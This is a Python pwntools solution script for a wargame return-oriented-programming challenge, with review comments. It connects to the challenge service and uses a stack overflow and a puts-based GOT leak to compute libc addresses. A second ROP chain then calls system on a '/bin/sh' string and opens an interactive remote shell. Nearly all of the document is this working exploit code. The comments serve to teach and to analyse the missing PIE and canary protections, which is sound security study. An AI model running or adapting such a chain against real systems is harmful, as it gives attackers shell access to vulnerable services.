Rop
from pwn import *
# Two-stage return-oriented-programming (ROP) solution script for a wargame
# challenge: stage 1 leaks a resolved library address, stage 2 reuses the
# same overflow with addresses computed from that leak.
#
# NOTE(review): str literals are concatenated with p64() output and passed to
# recvuntil(), so this is written for Python 2 string semantics.
#
# Defender's reading: as written, the script depends on (a) hard-coded
# addresses inside the main binary, which would not hold for a
# position-independent (PIE) build, (b) overwriting data 40 bytes past the
# start of the input with no stack-canary handling anywhere in the script,
# and (c) an output primitive that discloses a library pointer, which is what
# defeats library address randomisation here.

# Open a TCP connection to the challenge service.
s = remote("wargame.kimtae.xyz",10018)
# Local copy of a shared object, used only for symbol offsets below.
# Presumably the same libc build the remote service runs -- confirm.
lib = ELF('./rop.so')
# 40 filler bytes; presumably the distance from the input buffer to the saved
# return address -- verify against the target binary.
dummy = "A"*40
# Fixed addresses in the (apparently non-PIE) target binary. Meanings are
# inferred from the names; the binary itself is not shown:
#   p_rdi       - presumably a `pop rdi; ret` gadget (first-argument register)
#   puts_plt    - PLT stub for puts
#   puts_got    - GOT slot holding the run-time address of puts
#   vulner_addr - presumably the vulnerable function, re-entered after the leak
p_rdi = 0x00400793
puts_plt = 0x0000000000400520
puts_got = 0x0000000000601018
vulner_addr = 0x40067F
# Stage 1: filler, then a chain that amounts to puts(puts_got) followed by a
# return into vulner_addr so a second input can be sent on the same connection.
payload = dummy
payload += p64(p_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(vulner_addr)
s.sendline(payload)
# Skip the service banner and one further line before the leaked bytes.
s.recvuntil("Hello, Stranger!~~~~\n")
s.recvuntil("\n")
# Read the leaked line, drop the trailing newline and pad with two NUL bytes
# so u64() receives 8 bytes. This assumes exactly 6 address bytes came back;
# puts stops at the first NUL, and a 0x0a byte inside the address would end
# the read early.
libc_puts = u64(s.recvuntil("\n")[:-1] +"\x00\x00")
# Library load base = leaked puts address minus puts' offset in rop.so.
libc_base = libc_puts - lib.symbols['puts']
bin_system = libc_base + lib.symbols['system']
# Hard-coded offset into rop.so; presumably the "/bin/sh" string. It is only
# valid for this exact library build -- TODO confirm.
bin_binsh = libc_base + 0x18C58B
# Stage 2: same overflow, now loading bin_binsh into rdi and returning into
# system (i.e. system(<string at bin_binsh>)).
payload2 = dummy
payload2 += p64(p_rdi)
payload2 += p64(bin_binsh)
payload2 += p64(bin_system)
s.sendline(payload2)
# Hand the connection over to the terminal.
s.interactive()
